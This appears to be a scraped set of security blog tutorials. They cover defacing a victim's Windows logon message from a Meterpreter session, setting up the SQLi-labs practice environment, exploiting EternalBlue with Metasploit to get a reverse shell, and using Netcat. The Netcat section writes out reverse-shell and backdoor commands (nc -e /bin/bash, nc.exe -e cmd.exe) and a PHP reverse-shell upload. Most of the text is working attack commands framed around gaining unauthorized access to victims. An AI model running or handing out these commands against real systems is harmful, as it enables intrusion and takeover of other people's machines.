Hack Legal Notice Caption of Remote PC

Registry key play an important role in operating system attacker makes use of legal notice registry key to send threaten message on targeted system so that once the system is boot up the user can read the message that “your system has been hacked” which appears before login screen.

Through this article we are showing how an attacker sends threaten message on logon screen to the targeted users.

Let’s start

Attacker : Kali Linux

Target: window 7

 Read our previous article how to hack windows 7 and get meterpreter session of victims, inside meterpreter there are so many options for post exploit now type following command to move inside registry key of the victim’s system

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

 From screenshot you can observe that it contains 2 keys (Audit, UIPI) having 18 different values. The highlighting box is our targeted value.

  1. Legalnoticecaption
  2. legalnoticetext

Now type another command for assigning the value of legalnoticecaption which is use for providing the title or heading of the given message on logon screen.

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticecaption –d “IMPORTANT MESSAGE”

From screenshot you can read our registry key is successfully set.

Now type one more command for giving warning message to the targeted system by assigning value of legalnoticetext which will display your message on logon screen of victim’s system.

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticetext –d “PWNED BY RAJ CHANDEL”

 From screenshot you can read again our registry key is successfully set.

Here –k denote key; -V denote value; -d denote input data.

Now when the victim will start his system after then he will receive our message on logon screen as shown in given screenshot.

Try it yourself!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to set up SQLI Lab in in Kali

Hello everyone, with the joy of having new kali version somewhere few of us are having hard time in setting Dhakkan (AUDI-1) sqli series lab in our kali machine.

So today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) in our latest kali machine.

Download from here

Q – Why it is not as simple as it was in older version of kali?

Ans- In latest version of kali we are having PHP version 7.xxx which does not support MySQL functions because it support MySQLi functions.

MySQLi Extension (or simply known as MySQL improved or MySQLi) is a relational database driver that is used mainly in the PHP programming language. 

So we have 2 ways to set up

  • Degrade your PHP version to 5.xx
  • Change code of original Dhakkan lab to make it work with latest kali.

We’ll change code of labs.

Q- How I came to know that this is the issue?

Ans – When I set up my lab and browse it from my browser I saw I was unable to set up database required, See below screenshot

In the above screenshot see the URL .So now I know something is wrong in setup-db.php so I tried to run this specific file in my kali, see screenshot

So after googling the error I came to know I have to replace mysql_connect() with mysqli_connect()

After making this change when I run setup.php again I came across new error, see screenshot

So I replace mysql_query($sql) with mysqli_query($con, $sql)

($con is the connection link we made to our database) if you don’t know php don’t worry simply replace mysql_query($sql) with mysqli_query($con, $sql)

So this is how I debug the issue.

Now I am summarizing the changes that I made and you have to do to set up your lab.

Simply use Ctrl+F and replace all feature to make changes at a fast pace.

You have to make changes in index.php of ALL lessons, other php files in lessons and in all php files present in sql-connections Folder.

(Or you can contact me to get the edited lab)

S.No Replace Replace By
1 mysql_query($sql) mysqli_query($con, $sql)
2 mysql_error() mysqli_error($con)
3 mysql_fetch_array($result) mysqli_fetch_array($result, MYSQLI_BOTH)
4 mysql_fetch_array($result1) mysqli_fetch_array($result1, MYSQLI_BOTH)
5 mysql_connect($host,$dbuser,$dbpass) mysqli_connect($host,$dbuser,$dbpass)
6 mysql_real_escape_string($value) mysqli_real_escape_string($con, $value)
7 mysql_select_db($dbname, $con) mysqli_select_db($con, $dbname)

After making the above changes copy complete sqli-labs folder in /var/www/html folder of kali

Now open kali terminal and move to this folder using command “cd /var/www/html”

Now give permissions to sqlilabs folder using command “chmod 777 sqlilabs”

Now move to sqlilabs folder using command “cd sqlilabs” And give permissions to all files and folder in it using command “chmod 777 *”

Now your lab is ready to use you can access you lab using your browser Ip of your kali machine/sqlilabs

Click on Setup/reset Database for labs

Database set now practice and enjoy and use you skill to help organizations in securing their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal you may end up going behind the bars and ruin your career.

We are very thankful to Audi-1(aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.

Author – Rinkish Khera is a Web Application security consultant who loves competitive coding, hacking and learning new things about technology.

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.

Let’s start!!!

Attacker: Kali Linux

Target: window 7

 Open the terminal in your Kali Linux type msfconsole to load metasploit framework.

msfconsole

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

From screenshot you can see we have got meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.

Meterpreter> sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Netcat Tutorials for Beginner

From Wikipedia

In the field of hacking most utilized and powerful tool use by attack is popularly known as “Netcat” which is a computer networking function for analyzing from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool; since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very easy and multipurpose, it’s like trying to explain everything you can do with your Swiss Army knife.

For examples:-

  • Banner garbing
  • Bind shell (backdoor)
  • Chatting
  • File uploading and downloading
  • Port scanning
  • Port knocking
  • Port forwarding
  • Show webserver HTTP file contents

There are so many options inside netcat to enhance it function and effect when you will type nc –h in terminal of kali Linux. Before getting inside its working details you must aware of that here we had use two system one as attacker another as target system.  

Let’s begin

Port Knocking 

Open the terminal of your kali Linux and type following command which contains target’s IP and target port number.

Nc 192.168.1.21 2222

So when the given command will be executed it will tell about hidden running service through knocking the port, from given below image you can observe that port 2222 is open for SSH.

Reverse Shell

 Mainly attacker use netcat as backdoor for making unauthorized accessing target’s system, in this an attacker activates listening port (random port) when scan any vulnerable target .

nc -e /bin/bash 192.168.1.21 4444

 Above command will be waiting for reverse connect from victim’s system.

In given screenshot you can see the running web site is suffering from os command injection vulnerability now use nc –e /bin/bash 192.168.1.21 4444 to establish connection between victim and attacker’s system which will allow unauthorized access by creating backdoor.

Here you can see successfully we have (attacker) access victim’s shell through netcat.

Netcat as a Backdoor

Download netcat.exe for windows and type following command

Nc.exe 192.168.1.21 4444 –e cmd.exe

From given screenshot you can perceive that attacker successfully get connected with windows client through netcat

nc -lvp 4444

File Upload Exploitation

We will look how an attacker can exploit file upload vulnerability through netcat shell. From given image it is clear that the targeted webserver allow its client to upload an image.

For uploading we have use php-reverse-shell.php instead of image which a php backdoor. Open this web shell for editing listener IP i.e. your kali Linux IP (192.168.1.21) and then activate netcat using following command which will wait for establishing reverse connection with victim’s system.

nc -lvp 1234

Now after uploading your php backdoor inside web server and execute the file which will connect the victim’s system from attacker machine.

Hence you can see attacker successfully made unauthorized access through netcat shell.

HTTP Request

Use Netcat to fetch web page information from a webserver.  With Netcat you can search out the full HTTP header so you can see running particular site in web server. Now type following command that make a connection to port 80.

nc 192.168.1.11 80

OPTIONS / HTTP/1.0

 From screenshot you can read the detail of http header of the targeted web site.

Port Scanning

Netcat can also scan the TPC & UDP port hence it can be use in the place of NMAP which will tell us about open and close port of the targeted IP

The following command shows target IP and port range

-z:zero-I/O mode [used for scanning]

-w:timeout for connects and final net reads

-v:-v verbose

-l:listen mode, for inbound connects

-n:numeric-only IP addresses,

From resultant image you can see open ports with running services.

Chatting

Netcat is also used for the chatting from between two systems. We require putting together the Netcat to listen on a specific port on both system and connect to specific address.

nc -lvp 5678

nc 192.168.1.21 5678

Hi

How are you

Visit www.hackingarticles.in

File Transfer

As you know in windows we have download netcat.exe file now here I had use it for uploading a text file t.txt on targeted system through specific port.

nc 192.168.1.21 5555 < t.txt

Now receiver can download that t.txt file by giving similar port number that will establish connection between both systems.

nc -lvp 5555 > /root/Desktop/t.txt

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...